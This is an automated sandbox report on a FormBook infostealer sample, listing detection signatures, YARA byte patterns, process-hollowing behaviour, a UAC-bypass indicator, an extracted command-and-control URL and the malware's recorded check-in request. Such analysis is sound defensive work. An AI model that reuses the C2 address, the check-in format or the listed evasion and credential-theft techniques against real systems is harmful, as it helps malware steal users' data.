Edit tour

Windows Analysis Report
Order 20233.exe

Overview

General Information

Sample Name:	Order 20233.exe
Analysis ID:	780222
MD5:	cfc3542e983b4a7436dabb73132cbbdb
SHA1:	c792d80b3667badeef358a872cc5b548d9114151
SHA256:	614490e3bf7cf0672ecda890e33b49f4f8b80da18333111489284df04ab7d934
Tags:	exeformbook
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Yara detected UAC Bypass using CMSTP

Multi AV Scanner detection for submitted file

Yara detected FormBook

Malicious sample detected (through community Yara rule)

Yara detected AntiVM3

System process connects to network (likely due to code injection or exploit)

Antivirus detection for URL or domain

Multi AV Scanner detection for domain / URL

Snort IDS alert for network traffic

Sample uses process hollowing technique

Tries to steal Mail credentials (via file / registry access)

Maps a DLL or memory area into another process

Initial sample is a PE file and has a suspicious name

Writes to foreign memory regions

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Injects a PE file into a foreign processes

Queues an APC in another process (thread injection)

.NET source code contains very large strings

Modifies the context of a thread in another process (thread injection)

C2 URLs / IPs found in malware configuration

Tries to harvest and steal browser information (history, passwords, etc)

Queries the volume information (name, serial number etc) of a device

Yara signature match

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Internet Provider seen in connection with other malware

Detected potential crypto function

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to call native functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Contains functionality for execution timing, often used to detect debuggers

Contains long sleeps (>= 3 min)

Enables debug privileges

PE file does not import any functions

Sample file is different than original file name gathered from version info

Contains functionality to read the PEB

Checks if the current process is being debugged

Found large amount of non-executed APIs

Creates a process in suspended mode (likely to inject code)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

System is w10x64

Order 20233.exe (PID: 5872 cmdline: C:\Users\user\Desktop\Order 20233.exe MD5: CFC3542E983B4A7436DABB73132CBBDB)

aspnet_compiler.exe (PID: 6120 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe MD5: 7809A19AA8DA1A41F36B60B0664C4E20)

AddInProcess.exe (PID: 2140 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe MD5: 11D8A500C4C0FBAF20EBDB8CDF6EA452)

Microsoft.Workflow.Compiler.exe (PID: 1360 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe MD5: D91462AE31562E241AF5595BA5E1A3C4)

dfsvc.exe (PID: 2288 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe MD5: 48FD4DD682051712E3E7757C525DED71)

aspnet_wp.exe (PID: 2104 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe MD5: 3F68BCF536EEAE067038C67022CDF6D8)

aspnet_regsql.exe (PID: 5300 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regsql.exe MD5: F31014EE4DE7FE48E9B7C9BE94CFB45F)

aspnet_regiis.exe (PID: 1760 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regiis.exe MD5: 061D8C0371566D560C5B15C77A34046F)

mscorsvw.exe (PID: 3956 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe MD5: B00E9325AC7356A3F4864EAAAD48E13F)

ngen.exe (PID: 5612 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe MD5: FBA5E8D94C9EADC279BC06B9CF041A9A)

AddInProcess32.exe (PID: 4392 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe MD5: F2A47587431C466535F3C3D3427724BE)

explorer.exe (PID: 3452 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)

mstsc.exe (PID: 5380 cmdline: C:\Windows\SysWOW64\mstsc.exe MD5: 2412003BE253A515C620CE4890F3D8F3)

cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.ahmedo.ch/dcn0/"]}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000015.00000002.531522475.00000000037F0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000015.00000002.531522475.00000000037F0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000015.00000002.531522475.00000000037F0000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6611:$a1: 3C 30 50 4F 53 54 74 09 40 0x1f080:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa8af:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x17de7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000015.00000002.531522475.00000000037F0000.00000004.00000800.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x17be5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x17691:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x17ce7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x17e5f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa47a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x168dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x1ddf7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1edea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000015.00000002.531522475.00000000037F0000.00000004.00000800.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x1a0e9:$sqlite3step: 68 34 1C 7B E1 0x1ac61:$sqlite3step: 68 34 1C 7B E1 0x1a12b:$sqlite3text: 68 38 2A 90 C5 0x1aca6:$sqlite3text: 68 38 2A 90 C5 0x1a142:$sqlite3blob: 68 53 D8 7F 8C 0x1acbc:$sqlite3blob: 68 53 D8 7F 8C
00000011.00000002.428209911.0000000000401000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000011.00000002.428209911.0000000000401000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000011.00000002.428209911.0000000000401000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6d48:$a1: 3C 30 50 4F 53 54 74 09 40 0x1f7b7:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xafe6:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x1851e:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000011.00000002.428209911.0000000000401000.00000040.00000400.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x1831c:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x17dc8:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x1841e:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x18596:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xabb1:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x17013:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x1e52e:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1f521:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000011.00000002.428209911.0000000000401000.00000040.00000400.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x1a820:$sqlite3step: 68 34 1C 7B E1 0x1b398:$sqlite3step: 68 34 1C 7B E1 0x1a862:$sqlite3text: 68 38 2A 90 C5 0x1b3dd:$sqlite3text: 68 38 2A 90 C5 0x1a879:$sqlite3blob: 68 53 D8 7F 8C 0x1b3f3:$sqlite3blob: 68 53 D8 7F 8C
00000015.00000002.524509054.0000000000BB0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000015.00000002.524509054.0000000000BB0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000015.00000002.524509054.0000000000BB0000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6611:$a1: 3C 30 50 4F 53 54 74 09 40 0x1f080:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa8af:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x17de7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000015.00000002.524509054.0000000000BB0000.00000040.80000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x17be5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x17691:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x17ce7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x17e5f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa47a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x168dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x1ddf7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1edea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000015.00000002.524509054.0000000000BB0000.00000040.80000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x1a0e9:$sqlite3step: 68 34 1C 7B E1 0x1ac61:$sqlite3step: 68 34 1C 7B E1 0x1a12b:$sqlite3text: 68 38 2A 90 C5 0x1aca6:$sqlite3text: 68 38 2A 90 C5 0x1a142:$sqlite3blob: 68 53 D8 7F 8C 0x1acbc:$sqlite3blob: 68 53 D8 7F 8C
00000014.00000000.374923978.000000001033E000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000014.00000000.374923978.000000001033E000.00000040.00000001.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x10080:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x8de7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000014.00000000.374923978.000000001033E000.00000040.00000001.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8be5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x8691:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x8ce7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x8e5f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x78dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xedf7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0xfdea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000014.00000000.374923978.000000001033E000.00000040.00000001.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0xb0e9:$sqlite3step: 68 34 1C 7B E1 0xbc61:$sqlite3step: 68 34 1C 7B E1 0xb12b:$sqlite3text: 68 38 2A 90 C5 0xbca6:$sqlite3text: 68 38 2A 90 C5 0xb142:$sqlite3blob: 68 53 D8 7F 8C 0xbcbc:$sqlite3blob: 68 53 D8 7F 8C
00000015.00000002.528604995.00000000012D0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000015.00000002.528604995.00000000012D0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000015.00000002.528604995.00000000012D0000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6611:$a1: 3C 30 50 4F 53 54 74 09 40 0x1f080:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa8af:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x17de7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000015.00000002.528604995.00000000012D0000.00000040.10000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x17be5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x17691:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x17ce7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x17e5f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa47a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x168dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x1ddf7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1edea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000015.00000002.528604995.00000000012D0000.00000040.10000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x1a0e9:$sqlite3step: 68 34 1C 7B E1 0x1ac61:$sqlite3step: 68 34 1C 7B E1 0x1a12b:$sqlite3text: 68 38 2A 90 C5 0x1aca6:$sqlite3text: 68 38 2A 90 C5 0x1a142:$sqlite3blob: 68 53 D8 7F 8C 0x1acbc:$sqlite3blob: 68 53 D8 7F 8C
00000011.00000002.429045725.00000000017F0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000011.00000002.429045725.00000000017F0000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6611:$a1: 3C 30 50 4F 53 54 74 09 40 0xa8af:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000000.00000002.307240317.00000217000D0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: Order 20233.exe PID: 5872	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: Order 20233.exe PID: 5872	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: AddInProcess32.exe PID: 4392	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2c4bc:$a1: 3C 30 50 4F 53 54 74 09 40 0x12e9f0:$a1: 3C 30 50 4F 53 54 74 09 40
Process Memory Space: mstsc.exe PID: 5380	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x69808:$a1: 3C 30 50 4F 53 54 74 09 40 0xa5fea:$a1: 3C 30 50 4F 53 54 74 09 40 0x103fe5:$a1: 3C 30 50 4F 53 54 74 09 40
Click to see the 26 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.Order 20233.exe.21700429a18.0.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
0.2.Order 20233.exe.21700429a18.0.raw.unpack	INDICATOR_SUSPICIOUS_DisableWinDefender	Detects executables containing artifcats associated with disabling Widnows Defender	ditekSHen	0x9c39:$e1: Microsoft\Windows Defender\Exclusions\Paths 0x9c68:$e2: Add-MpPreference -ExclusionPath
0.2.Order 20233.exe.21700429a18.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM	Detects executables embedding command execution via IExecuteCommand COM object	ditekSHen	0x9c09:$r1: Classes\Folder\shell\open\command 0x9058:$k1: DelegateExecute

Snort Signatures

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.2.3 - Destination IP: 213.239.221.71

Timestamp:	192.168.2.3213.239.221.7149698802031412 01/08/23-16:24:08.929621
SID:	2031412
Source Port:	49698
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.2.3 - Destination IP: 213.239.221.71

Timestamp:	192.168.2.3213.239.221.7149698802031449 01/08/23-16:24:08.929621
SID:	2031449
Source Port:	49698
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.2.3 - Destination IP: 213.239.221.71

Timestamp:	192.168.2.3213.239.221.7149698802031453 01/08/23-16:24:08.929621
SID:	2031453
Source Port:	49698
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: Order 20233.exe	ReversingLabs: Detection: 51%
Source: Order 20233.exe	Virustotal: Detection: 40%			Perma Link

Yara detected FormBook

Source: Yara match	File source: 00000015.00000002.531522475.00000000037F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.428209911.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.524509054.0000000000BB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000000.374923978.000000001033E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.528604995.00000000012D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.429045725.00000000017F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Antivirus detection for URL or domain

Source: http://www.ahmedo.ch/dcn0/?pFQ0Q=4h6DHJsXwPiPeVap&oRk4IZo0=C4IpA5iiNFvhwRpGGB75QVE24l/FHjdcJi1XKvHDvYafZRhhpOblpVmnT5Y5r50LceSQqf3teF0eh20kxL606x8yuiPd0JQ74w==	Avira URL Cloud: Label: malware
Source: www.ahmedo.ch/dcn0/	Avira URL Cloud: Label: malware

Multi AV Scanner detection for domain / URL

Source: iamme-label.com	Virustotal: Detection: 8%			Perma Link
Source: www.ahmedo.ch/dcn0/	Virustotal: Detection: 9%			Perma Link

Source: 00000015.00000002.531522475.00000000037F0000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.ahmedo.ch/dcn0/"]}

Exploits

Yara detected UAC Bypass using CMSTP

Source: Yara match	File source: 0.2.Order 20233.exe.21700429a18.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.307240317.00000217000D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Order 20233.exe PID: 5872, type: MEMORYSTR

Source: Order 20233.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: AddInProcess32.pdb source: mstsc.exe, 00000015.00000002.533525731.00000000054E3000.00000004.10000000.00040000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: AddInProcess32.exe, 00000011.00000003.308531715.0000000001697000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000011.00000003.305774318.00000000014FF000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, mstsc.exe, 00000015.00000003.431126939.0000000005003000.00000004.00000800.00020000.00000000.sdmp, mstsc.exe, 00000015.00000002.531941308.00000000051A0000.00000040.00000800.00020000.00000000.sdmp, mstsc.exe, 00000015.00000003.428147207.0000000004E69000.00000004.00000800.00020000.00000000.sdmp, mstsc.exe, 00000015.00000002.533058558.00000000052BF000.00000040.00000800.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: AddInProcess32.exe, AddInProcess32.exe, 00000011.00000003.308531715.0000000001697000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000011.00000003.305774318.00000000014FF000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, mstsc.exe, 00000015.00000003.431126939.0000000005003000.00000004.00000800.00020000.00000000.sdmp, mstsc.exe, 00000015.00000002.531941308.00000000051A0000.00000040.00000800.00020000.00000000.sdmp, mstsc.exe, 00000015.00000003.428147207.0000000004E69000.00000004.00000800.00020000.00000000.sdmp, mstsc.exe, 00000015.00000002.533058558.00000000052BF000.00000040.00000800.00020000.00000000.sdmp
Source:	Binary string: mstsc.pdbGCTL source: AddInProcess32.exe, 00000011.00000003.416107815.000000000386B000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000011.00000003.420075103.0000000003BC4000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: AddInProcess32.pdbpw source: mstsc.exe, 00000015.00000002.533525731.00000000054E3000.00000004.10000000.00040000.00000000.sdmp
Source:	Binary string: c:\TeamCity\buildAgent\work\5644082abfe4d909\EFBuild\obj\Release\Migrate\migrate.pdb source: Order 20233.exe
Source:	Binary string: mstsc.pdb source: AddInProcess32.exe, 00000011.00000003.416107815.000000000386B000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000011.00000003.420075103.0000000003BC4000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\agent\1\s\sys\x64\Release\ProcExpDriver.pdb source: Order 20233.exe, 00000000.00000002.307240317.00000217000D0000.00000004.00000800.00020000.00000000.sdmp

Networking

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 213.239.221.71 80			Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.ahmedo.ch

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49698 -> 213.239.221.71:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49698 -> 213.239.221.71:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49698 -> 213.239.221.71:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: www.ahmedo.ch/dcn0/

Source: Joe Sandbox View

ASN Name: HETZNER-ASDE HETZNER-ASDE

Source: global traffic

HTTP traffic detected: GET /dcn0/?pFQ0Q=4h6DHJsXwPiPeVap&oRk4IZo0=C4IpA5iiNFvhwRpGGB75QVE24l/FHjdcJi1XKvHDvYafZRhhpOblpVmnT5Y5r50LceSQqf3teF0eh20kxL606x8yuiPd0JQ74w== HTTP/1.1Host: www.ahmedo.chConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: Joe Sandbox View

IP Address: 213.239.221.71 213.239.221.71

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 08 Jan 2023 15:24:08 GMTContent-Type: text/html; charset=utf-8Content-Length: 254Connection: closeX-Varnish: 1006141483Retry-After: 5Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 45 72 72 6f 72 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 20 20 20 20 3c 70 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 70 3e 0a 20 20 20 20 3c 68 33 3e 47 75 72 75 20 4d 65 64 69 74 61 74 69 6f 6e 3a 3c 2f 68 33 3e 0a 20 20 20 20 3c 70 3e 58 49 44 3a 20 31 30 30 36 31 34 31 34 38 33 3c 2f 70 3e 0a 20 20 20 20 3c 68 72 3e 0a 20 20 20 20 3c 70 3e 56 61 72 6e 69 73 68 20 63 61 63 68 65 20 73 65 72 76 65 72 3c 2f 70 3e 0a 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html> <head> <title>404 Not Found</title> </head> <body> <h1>Error 404 Not Found</h1> <p>Not Found</p> <h3>Guru Meditation:</h3> <p>XID: 1006141483</p> <hr> <p>Varnish cache server</p> </body></html>

Source: 4184-48M.21.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: 4184-48M.21.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: 4184-48M.21.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: mstsc.exe, 00000015.00000003.521808734.0000000001016000.00000004.00000020.00020000.00000000.sdmp, 4184-48M.21.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: 4184-48M.21.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: mstsc.exe, 00000015.00000003.521808734.0000000001016000.00000004.00000020.00020000.00000000.sdmp, 4184-48M.21.dr	String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: mstsc.exe, 00000015.00000003.521808734.0000000001016000.00000004.00000020.00020000.00000000.sdmp, 4184-48M.21.dr	String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
Source: mstsc.exe, 00000015.00000003.521808734.0000000001016000.00000004.00000020.00020000.00000000.sdmp, 4184-48M.21.dr	String found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
Source: mstsc.exe, 00000015.00000003.521808734.0000000001016000.00000004.00000020.00020000.00000000.sdmp, 4184-48M.21.dr	String found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
Source: mstsc.exe, 00000015.00000003.521808734.0000000001016000.00000004.00000020.00020000.00000000.sdmp, 4184-48M.21.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: Order 20233.exe, 00000000.00000002.307240317.00000217000D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.sysinternals.com0

Source: unknown

DNS traffic detected: queries for: www.ahmedo.ch

Source: global traffic

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 00000015.00000002.531522475.00000000037F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.428209911.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.524509054.0000000000BB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000000.374923978.000000001033E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.528604995.00000000012D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.429045725.00000000017F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.Order 20233.exe.21700429a18.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
Source: 0.2.Order 20233.exe.21700429a18.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 00000015.00000002.531522475.00000000037F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000015.00000002.531522475.00000000037F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000015.00000002.531522475.00000000037F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000011.00000002.428209911.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000011.00000002.428209911.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000011.00000002.428209911.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000015.00000002.524509054.0000000000BB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
